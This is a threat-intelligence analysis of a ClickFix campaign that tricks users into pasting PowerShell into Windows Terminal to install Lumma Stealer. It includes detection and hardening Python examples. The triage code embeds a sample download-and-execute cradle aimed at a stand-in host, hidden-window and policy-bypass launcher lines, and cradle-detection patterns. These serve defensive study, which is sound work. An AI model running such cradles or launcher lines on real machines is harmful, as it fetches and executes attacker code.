Full Report
Microsoft on Thursday disclosed details of a new widespread ClickFix social engineering campaign that has leveraged the Windows Terminal app as a way to activate a sophisticated attack chain and deploy the Lumma Stealer malware. The activity, observed in February 2026, makes use of the terminal emulator program instead of instructing users to launch the Windows Run dialog and paste a command
Analysis Summary
# Tool/Technique: ClickFix (Windows Terminal Variant)
## Overview
ClickFix is a social engineering technique that gets users to run attacker-supplied commands themselves by presenting the command as the fix for a problem the lure page fabricates (a browser error, a document that will not display). The variant Microsoft described swaps the usual Windows Run dialog (Win+R) for the **Windows Terminal** app as the place the victim is told to paste: a built-in tool reads as a legitimate administrative step, and controls written only for the Run dialog do not apply. The pasted command starts a multi-stage chain that ends in Lumma Stealer and credential theft.
## Technical Details
- **Type**: Social Engineering Technique / Malware Delivery Mechanism
- **Platform**: Windows 10/11
- **Capabilities**: User-driven command execution (the victim pastes and runs the command), PowerShell execution, remote payload download and, through Lumma Stealer, credential and data theft with exfiltration.
- **First Seen**: February 2026 (Activity observed)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.002 - Phishing: Spearphishing Link (links to the lure page; where the overlay sits on a compromised site the user browsed to on their own, T1189 - Drive-by Compromise fits better)
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1204.004 - User Execution: Malicious Copy and Paste (the victim pastes the command into Windows Terminal)
- **TA0005 - Defense Evasion**
- T1027.010 - Obfuscated Files or Information: Command Obfuscation (Base64-encoded command)
- **TA0006 - Credential Access**
- T1555.003 - Credentials from Password Stores: Credentials from Web Browsers (Lumma Stealer)
- **TA0007 - Discovery**
- T1082 - System Information Discovery
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Deceptive Overlays**: Displays a convincing fake error with a "Fix" button on compromised or attacker-controlled websites; the error is simulated by the page, nothing on the victim's machine is actually broken.
- **Clipboard Hijacking**: Page script writes the malicious PowerShell command to the clipboard when the user clicks "Fix" or "Copy", so the victim never reads the full command before pasting it.
- **Terminal as the Execution Surface**: Instructs the user to open Windows Terminal (`wt.exe`), which presents as a trusted built-in tool, and paste the string at the prompt. No vulnerability in Windows Terminal is involved; the user's own keystrokes do the work.
### Advanced Features
- **Detection Evasion**: Using Windows Terminal sidesteps controls and heuristics written for the Run dialog or `cmd.exe`, including the `NoRun` Explorer policy that many organizations deployed against the Win+R variant. This is an evasion property, not persistence.
- **Obfuscated Payloads**: The pasted command typically carries a Base64-encoded (`-EncodedCommand`) or otherwise obfuscated stage that fetches the next stage over HTTP, so static signatures on the visible command see little.
- **Lumma Stealer Integration**: Serves as the delivery vehicle for Lumma Stealer, an information stealer that targets browser passwords, cookies and cryptocurrency wallets.
## Indicators of Compromise
- **File Names**: `wt.exe` and `WindowsTerminal.exe` (legitimate Windows Terminal binaries used as the execution surface; `wt.exe` is the app execution alias that starts `WindowsTerminal.exe`). The final stealer binary carries no stable name; `Lumma.exe` is a placeholder, not an indicator to match on.
- **Network Indicators**: The summary gives only template shapes, not concrete values:
- `hxxps[:]//[random-subdomain].clickfix[.]com`
- `hxxp[:]//[c2-address-defanged]/api/v4/`
- Take real lure domains and C2 addresses from the Microsoft report; the bracketed placeholders above match nothing in a blocklist.
- **Behavioral Indicators**:
- `powershell.exe` as a child of `WindowsTerminal.exe` is also what every legitimate Terminal tab looks like. The indicator is a shell in that lineage whose command line carries `-EncodedCommand`, `-WindowStyle Hidden`, `-ExecutionPolicy Bypass` or a download cradle, or a second `powershell.exe` launched with those flags from the interactive shell.
- Clipboard content written by a browser process that contains `powershell -ExecutionPolicy Bypass` or similar launcher flags.
- Outbound connections to known Lumma C2 nodes shortly after a Windows Terminal session starts.
## Associated Threat Actors
- ClickFix is a shared technique used by many unrelated groups rather than one actor's tooling, and the Microsoft disclosure summarized above names no actor for this campaign.
- **Storm-1575**: Microsoft's designation for the Dadsec/Phoenix phishing-as-a-service operation. Nothing on this page ties it to this campaign; treat the association as unverified.
- **Lumma Stealer operators**: Lumma is sold as malware-as-a-service, so the affiliate running a given campaign, not the malware's developers, is the relevant actor.
## Detection Methods
- **Behavioral detection**: Alert on `powershell.exe` or `pwsh.exe` whose parent is `WindowsTerminal.exe`, or whose parent is an interactive shell under `WindowsTerminal.exe`, when the command line carries `-EncodedCommand`, `-WindowStyle Hidden`, `-ExecutionPolicy Bypass` or a download cradle such as `Invoke-Expression` or `Invoke-WebRequest`. A command pasted and run directly at the prompt creates no new process and leaves the host's own command line empty, so enable PowerShell script block logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104) and apply the same patterns to the script block text.
- **Clipboard Monitoring**: Where the EDR exposes clipboard telemetry, flag clipboard writes from a browser process whose content looks like a PowerShell launcher line.
- **Network Monitoring**: Block and alert on known ClickFix lure domains and Lumma C2 patterns, and correlate first-seen outbound connections from `powershell.exe` that begin within minutes of a Windows Terminal session.
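The behavioral indicators and detection methods above, worked through as an added example that is my own code, not Microsoft's or anything from the report. It triages constructed records shaped like Defender's DeviceProcessEvents (the field names are the real ones; the records, the `fix.example.invalid` URL and the regex patterns are assumptions made for the example). It decodes `-EncodedCommand`, scores launcher flags and download cradles, treats a bare shell under `WindowsTerminal.exe` as a new tab rather than an alert, and handles the case the process table cannot see: a command pasted at the interactive prompt, which only a 4104 script block records.

```python
import base64
import binascii
import re

# Launcher flags a ClickFix lure typically hands the victim, and download/execute cradles.
# Illustrative patterns assumed for this example, not a complete signature set.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
LAUNCHER_FLAGS = re.compile(
    r"(?:^|\s)-w[a-z]*\s+hidden\b|(?:^|\s)-e[a-z]*\s+bypass\b|(?:^|\s)-nop\b", re.IGNORECASE)
CRADLE = re.compile(
    r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod|"
    r"downloadstring|downloadfile|start-bitstransfer|curl|wget|certutil|mshta)\b",
    re.IGNORECASE)
TERMINAL = "windowsterminal.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def decode_encoded_command(text):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage_command_text(text):
    """Reasons a command line or 4104 script block text looks like a ClickFix stage."""
    reasons = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded command")
    if LAUNCHER_FLAGS.search(text):
        reasons.append("hidden window / policy bypass flags")
    visible = ENCODED_FLAG.sub(" ", text)  # keep base64 noise out of the word-boundary match
    if CRADLE.search(visible) or (decoded is not None and CRADLE.search(decoded)):
        reasons.append("download cradle")
    return reasons, decoded


def triage_process_event(ev):
    """Score one DeviceProcessEvents-style record. A bare shell whose parent is
    WindowsTerminal.exe is just a new tab, so lineage alone never raises an alert."""
    image = ev.get("FileName", "").lower()
    parent = ev.get("InitiatingProcessFileName", "").lower()
    grandparent = ev.get("InitiatingProcessParentFileName", "").lower()
    if image not in SHELLS:
        return {"suspicious": False, "terminal_lineage": False, "reasons": [], "decoded": None}
    lineage = parent == TERMINAL or (parent in SHELLS and grandparent == TERMINAL)
    reasons, decoded = triage_command_text(ev.get("ProcessCommandLine", ""))
    return {"suspicious": bool(reasons), "terminal_lineage": lineage,
            "reasons": reasons, "decoded": decoded}


def to_encoded_command(script):
    """Encode a script the way -EncodedCommand expects it: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry for the example; the .invalid domain never resolves.
STAGE_ONE = "iex (irm 'https://fix.example.invalid/v')"
SAMPLE_EVENTS = [
    {   # benign: a user opens a PowerShell tab in Windows Terminal
        "FileName": "powershell.exe",
        "ProcessCommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
        "InitiatingProcessFileName": "WindowsTerminal.exe",
        "InitiatingProcessParentFileName": "explorer.exe",
    },
    {   # Terminal variant: the pasted line spawns a hidden child shell from the interactive one
        "FileName": "powershell.exe",
        "ProcessCommandLine": "powershell -w hidden -ep bypass -enc " + to_encoded_command(STAGE_ONE),
        "InitiatingProcessFileName": "powershell.exe",
        "InitiatingProcessParentFileName": "WindowsTerminal.exe",
    },
    {   # Win+R variant for comparison: the Run dialog launches the shell under explorer.exe
        "FileName": "powershell.exe",
        "ProcessCommandLine": 'powershell -nop -w hidden -ep bypass -c "' + STAGE_ONE + '"',
        "InitiatingProcessFileName": "explorer.exe",
        "InitiatingProcessParentFileName": "userinit.exe",
    },
]
# Pasted straight at the prompt: no new process at all, only a 4104 script block records it.
SAMPLE_SCRIPT_BLOCK = STAGE_ONE


def run_demo():
    results = [triage_process_event(ev) for ev in SAMPLE_EVENTS]
    block_reasons, _ = triage_command_text(SAMPLE_SCRIPT_BLOCK)
    return results, block_reasons


if __name__ == "__main__":
    results, block_reasons = run_demo()
    for i, r in enumerate(results):
        print(i, "ALERT" if r["suspicious"] else "ok", r["terminal_lineage"], r["reasons"], r["decoded"])
    print("4104:", block_reasons)
```

The third record is deliberately the Win+R shape: the same content heuristics fire there, and `terminal_lineage` is reported separately as context rather than used as a gate, so the rule keeps working when the lure moves execution surfaces again. Feed real exports through `triage_process_event` and 4104 `ScriptBlockText` through `triage_command_text`.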
## Mitigation Strategies
- **Prevention measures**: Enable the Attack Surface Reduction rule "Block execution of potentially obfuscated scripts" and keep AMSI-integrated antimalware on, so decoded script content is scanned at run time; the Office child-process ASR rules do not apply here, because the chain involves no Office document. Application control (WDAC or AppLocker) that prevents unsigned downloaded executables from running stops the Lumma binary even when the PowerShell stage succeeds.
- **User Education**: Train users that no legitimate fix requires pasting a command copied from a website into Windows Terminal, PowerShell, Command Prompt or the Run dialog. Teaching only the Run dialog is what this variant routes around.
- **Hardening recommendations**: Execution policy is not a security control: `-ExecutionPolicy Bypass` overrides it and a command pasted at an interactive prompt is not subject to it at all, so `AllSigned` on its own stops nothing in this chain. Enforce Constrained Language Mode through WDAC or AppLocker script enforcement, turn on script block logging, leave Windows Terminal's paste warnings (`multiLinePasteWarning`, `largePasteWarning`) at their defaults, and do not count on the `NoRun` Explorer policy used against the Win+R variant, which does not cover Windows Terminal.
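The hardening checks above as an added example, my own code rather than anything Microsoft or the report provides: a small Python audit that reads Windows Terminal's settings.json and the policy registry values named in the list, and separates weak settings to fix from controls that exist but do not cover this variant. The registry value paths and the settings file location are the real ones; the sample settings text and registry dictionaries are constructed for the example, and the whole-line-comment handling for settings.json is an assumption that suffices for the shipped defaults.

```python
import json
import os

# Policy values the audit reads. Paths are the real ones; the input dictionaries below are
# constructed for this example (value data keyed by full path).
SCRIPT_BLOCK_LOGGING = (r"HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell"
                        r"\ScriptBlockLogging\EnableScriptBlockLogging")
NO_RUN = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun"
EXECUTION_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ExecutionPolicy"
TERMINAL_SETTINGS = os.path.join(
    os.environ.get("LOCALAPPDATA", ""), "Packages",
    "Microsoft.WindowsTerminal_8wekyb3d8bbwe", "LocalState", "settings.json")


def load_terminal_settings(text):
    """Parse settings.json, which Windows Terminal writes as JSONC. Only whole-line //
    comments are stripped (assumption: enough for the defaults it ships)."""
    kept = [line for line in text.splitlines() if not line.lstrip().startswith("//")]
    return json.loads("\n".join(kept))


def audit(settings, registry):
    """Return (findings, notes). Findings are weak settings to fix; notes are controls that
    are present but do not reach the Windows Terminal variant."""
    findings, notes = [], []
    for key in ("multiLinePasteWarning", "largePasteWarning"):
        if settings.get(key, True) is False:  # Terminal's default is true
            findings.append(f"Windows Terminal {key} is disabled; restore the default so a "
                            "multi-line or large paste prompts the user before it runs")
    if registry.get(SCRIPT_BLOCK_LOGGING) != 1:
        findings.append("Script block logging is off; a command pasted at an interactive "
                        "prompt leaves no process command line, so 4104 is the only record")
    if registry.get(NO_RUN) == 1:
        notes.append("NoRun blocks Win+R only; Windows Terminal stays reachable")
    policy = registry.get(EXECUTION_POLICY)
    if policy:
        notes.append(f"ExecutionPolicy={policy} is not a security boundary; "
                     "-ExecutionPolicy Bypass overrides it and interactive input ignores it")
    return findings, notes


def read_live():
    """On Windows, read the real settings file and registry values; None elsewhere."""
    try:
        import winreg
    except ImportError:
        return None
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    registry = {}
    for path in (SCRIPT_BLOCK_LOGGING, NO_RUN, EXECUTION_POLICY):
        hive, _, rest = path.partition("\\")
        subkey, _, value = rest.rpartition("\\")
        try:
            with winreg.OpenKey(hives[hive], subkey) as key:
                registry[path] = winreg.QueryValueEx(key, value)[0]
        except OSError:
            pass  # value not set: audit() treats it as absent
    try:
        with open(TERMINAL_SETTINGS, encoding="utf-8-sig") as f:
            settings = load_terminal_settings(f.read())
    except OSError:
        settings = {}
    return settings, registry


# Constructed inputs: a Win+R-era hardening baseline beside a corrected one.
WEAK_SETTINGS = """
{
    // constructed example of an admin-modified settings.json
    "multiLinePasteWarning": false,
    "largePasteWarning": false,
    "profiles": { "list": [] }
}
"""
WEAK_REGISTRY = {NO_RUN: 1, EXECUTION_POLICY: "AllSigned"}
HARDENED_SETTINGS = '{ "multiLinePasteWarning": true, "largePasteWarning": true }'
HARDENED_REGISTRY = {SCRIPT_BLOCK_LOGGING: 1}


def run_demo():
    weak = audit(load_terminal_settings(WEAK_SETTINGS), WEAK_REGISTRY)
    hardened = audit(load_terminal_settings(HARDENED_SETTINGS), HARDENED_REGISTRY)
    return weak, hardened


if __name__ == "__main__":
    live = read_live()
    (findings, notes) = audit(*live) if live else run_demo()[0]
    print("findings:", *findings, sep="\n  ")
    print("notes:", *notes, sep="\n  ")
```

The weak baseline is the one many environments built against the Win+R variant (`NoRun` set, an execution policy, no logging): it yields no findings about Win+R and still leaves the Terminal path open, which is the point of the notes list. One caveat the paste warnings cannot fix: a ClickFix lure is usually a single line, so `multiLinePasteWarning` never fires for it, and only `largePasteWarning` has a chance on a long encoded command.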
## Related Tools/Techniques
- **ClearFake**: A similar social engineering framework using fake browser updates.
- **Lumma Stealer**: The information stealer deployed as the final payload.
- **Win+R ClickFix**: The predecessor technique utilizing the Windows Run dialog.